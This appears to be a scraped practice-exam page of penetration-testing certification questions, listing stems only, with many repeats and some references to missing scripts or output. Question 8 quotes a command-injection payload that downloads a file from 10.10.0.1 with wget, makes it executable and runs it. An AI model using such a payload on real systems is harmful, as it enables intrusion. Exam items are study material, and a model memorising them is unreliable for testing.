MoreExam
1. Question Content...
EXPLANATION
Answer: X - EXPLANATION Content.
Question1: A penetration tester has established an on-path position between a target host and local network services but has not been able to establish an on-path position between the target host and the Internet. Regardless, the tester would like to subtly redirect HTTP connections to a spoofed server IP. Which of the following methods would BEST support the objective?
Question2: Which of the following BEST describes why a client would hold a lessons-learned meeting with the penetration-testing team?
Question3: A tester who is performing a penetration test on a website receives the following output:Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62Which of the following commands can be used to further attack the website?
Question4: A penetration tester ran a ping -A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?
Question5: A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT?
Question6: An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems.Which of the following is the penetration tester trying to accomplish?
Question7: When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal?
Question8: A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:exploit = "POST "exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a" exploit += "HTTP/1.1" Which of the following commands should the penetration tester run post-engagement?
Question9: A CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internalSendmail server. To remain stealthy, the tester ran the following command from the attack machine:Which of the following would be the BEST command to use for further progress into the targeted network?
Question10: A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are:Which of the following is the BEST method to help an attacker gain internal access to the affected machine?
Question11: A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant. Which of the following is the MINIMUM frequency to complete the scan of the system?
Question12: Which of the following assessment methods is MOST likely to cause harm to an ICS environment?
Question13: A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines. Which of the following documents could hold the penetration tester accountable for this action?
Question14: A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?
Question15: A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible.Which of the following Nmap scan syntaxes would BEST accomplish this objective?
Question16: A penetration tester writes the following script:Which of the following objectives is the tester attempting to achieve?
Question17: During an assessment, a penetration tester obtains a list of 30 email addresses by crawling the target company's website and then creates a list of possible usernames based on the email address format. Which of the following types of attacks would MOST likely be used to avoid account lockout?
Question18: A penetration tester gives the following command to a systems administrator to execute on one of the target servers:rm -f /var/www/html/G679h32gYu.phpWhich of the following BEST explains why the penetration tester wants this command executed?
Question19: You are a penetration tester reviewing a client's website through a web browser.INSTRUCTIONSReview all components of the website through the browser to determine if vulnerabilities are present.Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Question20: A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important dat a. Which of the following was captured by the testing team?
Question21: A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to bevalid?
Question22: A penetration tester who is conducting a web-application test discovers a clickjacking vulnerability associated with a login page to financial dat a. Which of the following should the tester do with this information to make this a successful exploit?
Question23: An assessor wants to use Nmap to help map out a stateful firewall rule set. Which of the following scans will the assessor MOST likely run?
Question24: A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report?
Question25: A company becomes concerned when the security alarms are triggered during a penetration test. Which of the following should the company do NEXT?
Question26: A penetration tester conducts an Nmap scan against a target and receives the following results:Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target?
Question27: A consultant is reviewing the following output after reports of intermittent connectivity issues:? (192.168.1.1) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]? (192.168.1.12) at 34:a4:be:09:44:f4 on en0 ifscope [ethernet]? (192.168.1.17) at 92:60:29:12:ac:d2 on en0 ifscope [ethernet]? (192.168.1.34) at 88:de:a9:12:ce:fb on en0 ifscope [ethernet]? (192.168.1.136) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]? (192.168.1.255) at ff:ff:ff:ff:ff:ff on en0 ifscope [ethernet]? (224.0.0.251) at 01:02:5e:7f:ff:fa on en0 ifscope permanent [ethernet]? (239.255.255.250) at ff:ff:ff:ff:ff:ff on en0 ifscope permanent [ethernet] Which of the following is MOST likely to be reported by the consultant?
Question28: A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?
Question29: A penetration tester is conducting a penetration test. The tester obtains a root-level shell on a Linux server and discovers the following data in a file named password.txt in the /home/svsacct directory:U3VQZXIkM2NyZXQhCg==Which of the following commands should the tester use NEXT to decode the contents of the file?
Question30: A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports. To further enumerate, the tester ran another scan using the following command:nmap -O -A -sS -p- 100.100.100.50Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan?
Question31: A software company has hired a security consultant to assess the security of the company's software development practices. The consultant opts to begin reconnaissance by performing fuzzing on a software binary. Which of the following vulnerabilities is the security consultant MOST likely to identify?
Question32: A penetration tester needs to upload the results of a port scan to a centralized security tool. Which of the following commands would allow the tester to save the results in an interchangeable format?
Question33: A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?
Question34: A penetration tester is assessing a wireless network. Although monitoring the correct channel and SSID, the tester is unable to capture a handshake between the clients and the AP. Which of the following attacks is the MOST effective to allow the penetration tester to capture a handshake?
Question35: A company has hired a penetration tester to deploy and set up a rogue access point on the network.Which of the following is the BEST tool to use to accomplish this goal?
Question36: During an assessment, a penetration tester was able to access the organization's wireless network from outside of the building using a laptop running Aircrack-ng. Which of the following should be recommended to the client to remediate this issue?
Question37: You are a penetration tester running port scans on a server.INSTRUCTIONSPart 1: Given the output, construct the command that was used to generate this output from the available options.Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Question38: The following PowerShell snippet was extracted from a log of an attacker machine:A penetration tester would like to identify the presence of an array. Which of the following line numbers would define the array?
Question39: Which of the following is the BEST resource for obtaining payloads against specific network infrastructure products?
Question40: A software development team is concerned that a new product's 64-bit Windows binaries can be deconstructed to the underlying code. Which of the following tools can a penetration tester utilize to help the team gauge what an attacker might see in the binaries?
Question41: A penetration tester logs in as a user in the cloud environment of a company. Which of the following Pacu modules will enable the tester to determine the level of access of the existing user?
Question42: A penetration tester performs the following command:curl -I -http2 https://www.comptia.orgWhich of the following snippets of output will the tester MOST likely receive?
Question43: The following line-numbered Python code snippet is being used in reconnaissance:Which of the following line numbers from the script MOST likely contributed to the script triggering a"probable port scan" alert in the organization's IDS?
Question44: An assessor wants to run an Nmap scan as quietly as possible. Which of the following commands will give the LEAST chance of detection?
Question45: A penetration tester runs the following command on a system:find / -user root -perm -4000 -print 2>/dev/nullWhich of the following is the tester trying to accomplish?
Question46: You are a penetration tester reviewing a client's website through a web browser.INSTRUCTIONSReview all components of the website through the browser to determine if vulnerabilities are present.Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Question47: A tester who is performing a penetration test discovers an older firewall that is known to have serious vulnerabilities to remote attacks but is not part of the original list of IP addresses for the engagement. Which of the following is the BEST option for the tester to take?
Question48: Performing a penetration test against an environment with SCADA devices brings additional safety risk because the:
Question49: A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP. Which of the following steps should the tester take NEXT?
Question50: A penetration tester who is conducting a web-application test discovers a clickjacking vulnerability associated with a login page to financial data. Which of the following should the tester do with this information to make this a successful exploit?
Question51: A penetration tester has found indicators that a privileged user's password might be the same on 30 different Linux systems. Which of the following tools can help the tester identify the number of systems on which the password can be used?
Question52: An Nmap network scan has found five open ports with identified services. Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports?
Question53: You are a security analyst tasked with hardening a web server.You have been given a list of HTTP payloads that were flagged as malicious.INSTRUCTIONSGiven the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Question54: A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal. Eighty percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site. Which of the following recommendations would BEST address this situation?
Question55: A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report?
Question56: A penetration tester is able to use a command injection vulnerability in a web application to get a reverse shell on a system After running a few commands, the tester runs the following:python -c 'import pty; pty.spawn("/bin/bash")'Which of the following actions Is the penetration tester performing?
Question57: A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees' phone numbers on the company's website, the tester has learned the complete phone catalog was published there a few months ago.In which of the following places should the penetration tester look FIRST for the employees' numbers?
Question58: Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience?
Question59: A CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internal Sendmail server. To remain stealthy, the tester ran the following command from the attack machine:Which of the following would be the BEST command to use for further progress into the targeted network?
Question60: A penetration tester conducted a discovery scan that generated the following:Which of the following commands generated the results above and will transform them into a list of active hosts for further analysis?
Question61: A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:Have a full TCP connectionSend a "hello" payloadWalt for a responseSend a string of characters longer than 16 bytesWhich of the following approaches would BEST support the objective?
Question62: A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment?
Question63: A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company's network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment.Which of the following actions should the tester take?
Question64: A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?
Question65: A security engineer identified a new server on the network and wants to scan the host to determine if it is running an approved version of Linux and a patched version of Apache. Which of the following commands will accomplish this task?
Question66: A penetration tester runs the following command on a system:find / -user root -perm -4000 -print 2>/dev/nullWhich of the following is the tester trying to accomplish?
Question67: A penetration tester is reviewing the following DNS reconnaissance results for comptia.org from dig:comptia.org. 3569 IN MX comptia.org-mail.protection.outlook.com. comptia.org. 3569 IN A 3.219.13.186. comptia.org.3569 IN NS ns1.comptia.org. comptia.org. 3569 IN SOA haven. administrator.comptia.org. comptia.org. 3569 IN MX new.mx0.comptia.org. comptia.org. 3569 IN MX new.mx1.comptia.org.Which of the following potential issues can the penetration tester identify based on this output?
Question68: A penetration tester is testing a new API for the company's existing services and is preparing the following script:Which of the following would the test discover?
Question69: Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?
Question70: Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff?
Question71: Which of the following concepts defines the specific set of steps and approaches that are conducted during a penetration test?
Question72: Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?
Question73: A penetration tester performs the following command:curl -I -http2 https://www.comptia.orgWhich of the following snippets of output will the tester MOST likely receive?
Question74: A client would like to have a penetration test performed that leverages a continuously updated TTPs framework and covers a wide variety of enterprise systems and networks. Which of the following methodologies should be used to BEST meet the client's expectations?
Question75: A security firm is discussing the results of a penetration test with the client. Based on the findings, the client wants to focus the remaining time on a critical network segment. Which of the following BEST describes the action taking place?
Question76: Which of the following should a penetration tester attack to gain control of the state in the HTTP protocol after the user is logged in?
Question77: A penetration tester has been hired to configure and conduct authenticated scans of all the servers on a software company's network. Which of the following accounts should the tester use to return the MOST results?
Question78: A penetration tester was brute forcing an internal web server and ran a command that produced the following output:However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed.Which of the following is the MOST likely reason for the lack of output?
Question79: Which of the following types of assessments MOST likely focuses on vulnerabilities with the objective to access specific data?
Question80: A penetration tester wants to scan a target network without being detected by the client's IDS. Which of the following scans is MOST likely to avoid detection?
Question81: Penetration tester has discovered an unknown Linux 64-bit executable binary. Which of the following tools would be BEST to use to analyze this issue?
Question82: A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop. Which of the following can be used to ensure the tester is able to maintain access to the system?
Question83: During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.INSTRUCTIONSAnalyze the code segments to determine which sections are needed to complete a port scanning script.Drag the appropriate elements into the correct locations to complete the script.If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Question84: A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?
Question85: Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?
Question86: A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?
Question87: A tester who is performing a penetration test on a website receives the following output:Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62 Which of the following commands can be used to further attack the website?
Question88: A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP. Which of the following steps should the tester take NEXT?
Question89: A penetration tester is examining a Class C network to identify active systems quickly. Which of the following commands should the penetration tester use?
Question90: A private investigation firm is requesting a penetration test to determine the likelihood that attackers can gain access to mobile devices and then exfiltrate data from those devices. Which of the following is a social-engineering method that, if successful, would MOST likely enable both objectives?
Question91: A penetration tester discovers that a web server within the scope of the engagement has already been compromised with a backdoor. Which of the following should the penetration tester do NEXT?
Question92: A penetration tester conducted a vulnerability scan against a client's critical servers and found the following:Which of the following would be a recommendation for remediation?
Question93: A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP. Which of the following steps should the tester take NEXT?
Question94: Running a vulnerability scanner on a hybrid network segment that includes general IT servers and industrial control systems:
Question95: A large client wants a penetration tester to scan for devices within its network that are Internet facing. The client is specifically looking for Cisco devices with no authentication requirements. Which of the following settings in Shodan would meet the client's requirements?
Question96: A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter with other companies sharing physical resources. Which of the following attack types is MOST concerning to the company?
Question97: A penetration tester runs a scan against a server and obtains the following output:21/tcp open ftp Microsoft ftpd| ftp-anon: Anonymous FTP login allowed (FTP code 230)| 03-12-20 09:23AM 331 index.aspx| ftp-syst:135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn445/tcp open microsoft-ds Microsoft Windows Server 2012 Std3389/tcp open ssl/ms-wbt-server| rdp-ntlm-info:| Target Name: WEB3| NetBIOS_Computer_Name: WEB3| Product_Version: 6.3.9600|_ System_Time: 2021-01-15T11:32:06+00:008443/tcp open http Microsoft IIS httpd 8.5| http-methods:|_ Potentially risky methods: TRACE|_http-server-header: Microsoft-IIS/8.5|_http-title: IIS Windows ServerWhich of the following command sequences should the penetration tester try NEXT?
Question98: A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee's birthday, the tester gave the employee an external hard drive as a gift. Which of the following social-engineering attacks was the tester utilizing?
Question99: A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?
Question100: A penetration tester writes the following script:Which of the following objectives is the tester attempting to achieve?
Question101: A penetration tester was contracted to test a proprietary application for buffer overflow vulnerabilities. Which of the following tools would be BEST suited for this task?
Question102: A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client's building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet.Which of the following tools or techniques would BEST support additional reconnaissance?
Question103: The following line-numbered Python code snippet is being used in reconnaissance:Which of the following line numbers from the script MOST likely contributed to the script triggering a "probable port scan" alert in the organization's IDS?
Question104: Which of the following can be used to store alphanumeric data that can be fed into scripts or programs as input to penetration-testing tools?
Question105: A security firm has been hired to perform an external penetration test against a company. The only information the firm received was the company name. Which of the following passive reconnaissance approaches would be MOST likely to yield positive initial results?
Question106: A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan?
Question107: A penetration tester needs to perform a vulnerability scan against a web server. Which of the following tools is the tester MOST likely to choose?
Question108: A company's Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi's router.Which of the following is MOST vulnerable to a brute-force attack?
Question109: An assessment has been completed, and all reports and evidence have been turned over to the client. Which of the following should be done NEXT to ensure the confidentiality of the client's information?
Question110: The attacking machine is on the same LAN segment as the target host during an internal penetration test. Which of the following commands will BEST enable the attacker to conduct host delivery and write the discovery to files without returning results of the attack machine?
Question111: A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?
Question112: The following line-numbered Python code snippet is being used in reconnaissance:Which of the following line numbers from the script MOST likely contributed to the script triggering a "probable port scan" alert in the organization's IDS?
Question113: During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.INSTRUCTIONSAnalyze the code segments to determine which sections are needed to complete a port scanning script.Drag the appropriate elements into the correct locations to complete the script.If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.